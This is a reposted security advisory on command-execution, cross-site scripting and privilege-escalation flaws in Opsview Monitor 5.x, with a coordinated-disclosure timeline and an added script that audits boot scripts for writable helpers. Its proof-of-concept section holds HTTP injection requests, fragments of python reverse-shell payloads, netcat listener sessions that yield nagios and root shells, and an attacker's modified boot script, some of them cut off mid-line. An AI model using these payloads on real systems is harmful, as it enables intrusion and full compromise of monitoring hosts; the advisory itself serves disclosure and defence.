Packet Storm: Core Security Technologies advisory, PACKETSTORM:149236
Posted: Sep 05, 2018

Opsview Monitor 5.x Command Execution

Core Security Technologies

Core Security - Corelabs Advisory  
Opsview Monitor Multiple Vulnerabilities  
1. **Advisory Information**  
Title: Opsview Monitor Multiple Vulnerabilities  
Advisory ID: CORE-2018-0008  
Advisory URL:  
Date published: 2018-09-04  
Date of last update: 2018-09-04  
Vendors contacted: Opsview  
Release mode: Coordinated release  
2. **Vulnerability Information**  
Class: Improper Neutralization of Input During Web Page Generation  
[CWE-79], Improper Neutralization of Input During Web Page Generation  
[CWE-79], Improper Neutralization of Special Elements used in an OS  
Command [CWE-78], Improper Neutralization of Special Elements used in  
an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145  
3. **Vulnerability Description**  
Opsview's website states that:  
Opsview[1] builds monitoring software that helps DevOps understand how  
the performance of their hybrid IT infrastructure & apps impacts  
business service delivery. Opsview Monitor supports +3500 Nagios plugins  
and service checks making it easy to monitor everything from Docker and  
VMware to Amazon Web Services, Hyper-V and more.  
Multiple vulnerabilities were found in the Opsview Monitor, which would  
allow an attacker with access to the management console to execute  
commands on the operating system.  
4. **Vulnerable Packages**  
. Opsview Monitor 5.4  
. Opsview Monitor 5.3  
. Opsview Monitor 5.2  
Other products and versions might be affected, but they were not tested.  
5. **Vendor Information, Solutions and Workarounds**  
Opsview released the following versions of its product that fix the  
reported issues.  
. Opsview Monitor 6.0  
. Opsview Monitor 5.4.2  
. Opsview Monitor 5.3.1  
In addition, Opsview published the following release notes:  
6. **Credits**  
These vulnerabilities were discovered and researched by Fernando Diaz  
and Fernando Catoira from Core Security Consulting Services. The  
publication of this advisory was coordinated by Leandro Cuozzo from Core  
Advisories Team.  
7. **Technical Description / Proof of Concept Code**  
Opsview Monitor is a virtual appliance designed to be deployed inside  
the organization's network infrastructure. It comes bundled with a Web  
Management Console to monitor and manage hosts and their services.  
Multiple vulnerabilities were found in the context of this appliance,  
which could allow a remote attacker to compromise the system.  
Vulnerabilities described in 7.1 and 7.2 could be abused to execute  
malicious JavaScript code in the context of a legitimate user.  
In addition, issues presented in 7.3 and 7.4 could allow an attacker to  
obtain command execution on the system as the nagios user. Finally, the  
issue found in one of the scripts run during the boot process presented  
in 7.5 would allow attackers to elevate their privileges from nagios  
user to root after a system restart, hence obtaining full control of the  
7.1. **Reflected Cross-Site Scripting in Diagnostics**  
[CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest'  
endpoint is vulnerable to Cross-Site Scripting.  
The following proof of concept demonstrates the vulnerability:  
Host: <serverIP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)  
Gecko/20100101 Firefox/59.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  
7.2. **Persistent Cross-Site Scripting in Settings endpoint**  
[CVE-2018-16147] The 'data' parameter of the '/settings/api/router'  
endpoint is vulnerable to Cross-Site Scripting. The following proof of  
concept demonstrates the vulnerability:  
POST /settings/api/router?_dc=1521575692128 HTTP/1.1  
Host: <serverIP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)  
Gecko/20100101 Firefox/59.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://<serverIP>/settings/  
x-opsview-username: rifle  
x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503  
Content-Type: application/json  
X-Requested-With: XMLHttpRequest  
Content-Length: 506  
Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;  
Connection: close  
The input is stored without any sanitization and rendered every time the  
/settings section is visited by the user. It is important to point out  
that this XSS is self-stored and is executed only in the context of the  
victim's session. However, an attacker can exploit this vulnerability to  
gain persistence and execute the malicious code each time the victim  
accesses the settings section.  
Excerpt of the source code showing the injected script tag:  
7.3. **Notification abuse leading to remote command execution**  
[CVE-2018-16146] Opsview Web Management console provides a functionality  
accessible by an authenticated administrator to test notifications that  
are triggered under certain configurable events. The 'value' parameter  
is not properly sanitized, leading to arbitrary command injection  
executed on the system with the privileges of the nagios user.  
The following proof of concept executes a reverse shell:  
POST /rest/config/notificationmethod/testnotification?_dc=1520444703477  
Host: <serverIP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)  
Gecko/20100101 Firefox/58.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://<serverIP>/settings/  
x-opsview-username: admin  
x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074  
Content-Type: application/json  
X-Requested-With: XMLHttpRequest  
Content-Length: 376  
Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;  
Connection: close  
|| python -c 'import  
nc -lvp 16000  
Listening on [] (family 0, port 16000)  
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,  
sport 43016)  
$ id  
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)  
Additionally, it is possible to combine this issue with a redirection  
functionality within the management console and the vulnerability  
described in 7.1 (Reflected Cross-Site Scripting), to build a specially  
crafted link that could be sent to an administrator to trigger a reverse  
In order to perform the attack, consider the following:  
. API's sensitive actions require a 'restToken' to be processed. This  
token could be obtained by a Cross-Site Scripting attack from a specific  
endpoint (/settings).  
. Abuse the login page redirection functionality to force the user to  
access the Cross-Site Scripting vulnerable URL described in 7.1 (you may  
also abuse the Cross-Site scripting vulnerability reported in given it is still present).  
If the user is already authenticated, they will be automatically redirected.  
Otherwise, the login page will appear and the redirection will take  
place after a successful login.  
The following proof of concept presents a crafted link that could  
trigger a reverse shell if accessed by an administrator:  
Once clicked, the authenticated administrator will be redirected to the  
vulnerable section, where their browser will perform a request to the  
'/settings' endpoint in order to obtain a valid 'restToken'. Finally,  
using that token, the API request to  
'rest/config/notificationmethod/testnotification' will be exploited thus  
resulting in a reverse shell.  
7.4. **Rancid test connection functionality abuse leading to command execution**  
[CVE-2018-16144] NetAudit is a section within Network Analyzer that  
allows the user to automate the backing up of network devices'  
configuration files to a centralized location. The test connection  
functionality is vulnerable to command injection due to an improper  
sanitization of the 'rancid_password' parameter.  
The following proof of concept executes a reverse shell:  
POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1  
Host: <serverIP>  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)  
Gecko/20100101 Firefox/59.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://<serverIP>/settings/  
x-opsview-username: admin  
x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 434  
Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;  
Connection: close  
nc -lvp 16000  
Listening on [] (family 0, port 16000)  
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,  
sport 43016)  
$ id  
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)  
$ uname -a  
Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34  
UTC 2018 x86_64 x86_64 x86_64 GNU/Linux  
7.5. **Script modification could allow local privilege escalation**  
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios  
privileges, and the scripts that run at boot time impersonate the nagios  
user during their execution. However, the  
'/etc/init.d/opsview-reporting-module' script invokes the  
'/opt/opsview/jasper/bin/db_jasper' script before dropping root  
The following excerpt shows the vulnerable code:  
# Runs as root: the switch to the opsview user only happens further down  
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null  
if [ $? != 0 ]; then  
    echo "Attempted to start jasperserver but MySQL credentials are wrong."  
    exit 0  
fi  
test -x $DAEMON || exit 0  
# Switch to opsview user if run as root  
id | grep "uid=0(" >/dev/null  
if [ $? = 0 ] ; then  
    su - opsview -c "$DAEMON $@"  
else  
    exec $DAEMON $@  
fi  
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the  
vulnerable script while it still runs as root, is group-writable and can  
therefore be edited by the nagios user, which belongs to the 'opsview' group.  
ls -ltr /opt/opsview/jasper/bin/db_jasper  
-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017  
nagios@image-builder-299:/home/admin$ id  
uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)  
Since 'db_jasper' receives 'db_exists' as an argument, which is later  
used in a case statement, an attacker could edit that specific part of  
the script in order to execute arbitrary code once the appliance is  
The following excerpt shows the attacker's bash script which, after  
execution, will trigger a reverse shell with root privileges:  
while [ "x$1" != "x" ] ; do  
case "$1" in  
python -c 'import  
os.dup2(s.fileno(),2);["/bin/bash","-i"]);' &  
exit $?  
exit $?  
die "Usage: $0  
$ nc -lvp 16000  
Listening on [] (family 0, port 16000)  
Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2,  
sport 45566)  
# id  
uid=0(root) gid=0(root) groups=0(root)  
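As an added defensive check, not part of the advisory, the script below audits a boot script for files it invokes that a non-root group or other users can modify, which is the pattern behind CVE-2018-16145 (a root-run init script executing a group-writable helper before dropping privileges). The fixture directory, helper name 'db_helper' and script 'init' are constructed for the demo; paths built from shell variables such as $DAEMON are not resolved.

```shell
#!/bin/sh
# Added example, not part of the advisory: audit a boot script for helper
# files it runs that a non-root group or other users can modify. This is
# the CVE-2018-16145 pattern: a root-run init script executing a
# group-writable helper (db_jasper, -rwxrwxr-x opsview:opsview) before it
# drops privileges. Paths held in shell variables are not resolved.

# Print the absolute paths literally referenced by a script, one per line.
referenced_paths() {
    grep -oE '(^|[[:space:]"'"'"'=])/[A-Za-z0-9_./-]+' "$1" \
        | sed -E 's/^[[:space:]"'"'"'=]//' | sort -u
}

# Exit 0 and list offenders if any referenced regular file is writable
# by its group or by others; exit 1 if every referenced file is safe.
weak_invoked_paths() {
    rc=1
    for p in $(referenced_paths "$1"); do
        [ -f "$p" ] || continue
        mode=$(ls -ld "$p" | cut -c1-10)   # e.g. -rwxrwxr-x
        gw=$(printf '%s' "$mode" | cut -c6) # group write bit
        ow=$(printf '%s' "$mode" | cut -c9) # other write bit
        if [ "$gw" = "w" ] || [ "$ow" = "w" ]; then
            echo "WRITABLE: $p ($mode)"
            rc=0
        fi
    done
    return $rc
}

# Constructed fixture (hypothetical paths): a group-writable helper and a
# boot script that calls it, mirroring the db_jasper excerpt. Prints the
# fixture directory so callers can inspect and remove it.
build_demo() {
    d=$(mktemp -d)
    mkdir -p "$d/bin"
    printf '#!/bin/sh\necho helper\n' > "$d/bin/db_helper"
    chmod 775 "$d/bin/db_helper"
    printf '#!/bin/sh\n%s db_exists 2> /dev/null\nexec /bin/true\n' \
        "$d/bin/db_helper" > "$d/init"
    echo "$d"
}

demo=$(build_demo)
weak_invoked_paths "$demo/init" || echo "no writable helper referenced"
rm -rf "$demo"
```

Run it against real init scripts (for example the files under /etc/init.d) to find helpers that a lower-privileged group could alter before they are executed as root.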
8. **Report Timeline**  
2018-05-03: Core Security sent an initial notification to Opsview,  
asking for GPG keys in order to send draft advisory.  
2018-05-04: Opsview replied attaching its GPG keys.  
2018-05-04: Core Security sent the encrypted draft advisory.  
2018-05-04: Opsview confirmed the reception of the advisory and informed  
an initial response would be ready by May 11th.  
2018-05-11: Opsview replied saying they were able to reproduce all of  
the reported vulnerabilities and confirmed that they were present in all  
supported versions of Opsview Monitor (5.4, 5.3 and 5.2).  
In addition, Opsview informed that they were planning to release a fix for  
these versions by the end of July.  
2018-05-11: Core Security thanked Opsview for the confirmation.  
2018-06-25: Opsview informed that they were planning to release a major  
update for the product (6.0) at the end of July. This update will  
address all reported vulnerabilities. Also, they informed that the  
previous versions of the product would be fixed by the end of August.  
2018-06-27: Core Security thanked Opsview for the status update and asked  
for a tentative public disclosure date.  
2018-07-16: Core Security requested a status update.  
2018-07-18: Opsview proposed setting a tentative publication date at the  
end of August, when they would release the fixes for the earlier versions.  
2018-07-18: Core Security agreed with Opsview's proposal.  
2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0  
release will be available on July 25th. In addition, they  
informed that they didn't have the exact release date for the updates to  
previous versions of the product.  
2018-08-06: Core Security requested a status update for the remaining  
2018-08-13: Opsview replied saying that they were targeting the week of  
August 24th to release the fixes for their earlier product versions and  
would confirm the exact date at the end of the following week.  
2018-08-13: Core Security thanked Opsview for the reply.  
2018-08-24: Opsview informed Core Security that the remaining fixed  
versions will be available on August 29th.  
2018-08-24: Core Security thanked Opsview for the update and proposed  
September 4th as the coordinated release date.  
2018-08-28: Opsview agreed on the proposed release date.  
2018-09-04: Advisory CORE-2018-0008 published.  
9. **References**  
10. **About CoreLabs**  
CoreLabs, the research center of Core Security, is charged with  
anticipating the future needs and requirements for information security  
We conduct our research in several important areas of computer security  
including system vulnerabilities, cyber attack planning and simulation,  
source code auditing, and cryptography. Our results include problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. CoreLabs regularly publishes security  
advisories, technical papers, project information and shared software  
tools for public use at:  
11. **About Core Security**  
Core Security provides companies with the security insight they need to  
know who, how, and what is vulnerable in their organization. The  
company's threat-aware, identity & access, network security, and  
vulnerability management solutions provide actionable insight and  
context needed to manage security risks across the enterprise. This  
shared insight gives customers a comprehensive view of their security  
posture to make better security remediation decisions. Better insight  
allows organizations to prioritize their efforts to protect critical  
assets, take action sooner to mitigate access risk, and react faster if  
a breach does occur.  
Core Security is headquartered in the USA with offices and operations in  
South America, Europe, Middle East and Asia. To learn more, contact Core  
Security at (678) 304-4500 or [email protected]  
12. **Disclaimer**  
The contents of this advisory are copyright (c) 2018 Core Security and  
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution  
Non-Commercial Share-Alike 3.0 (United States) License:  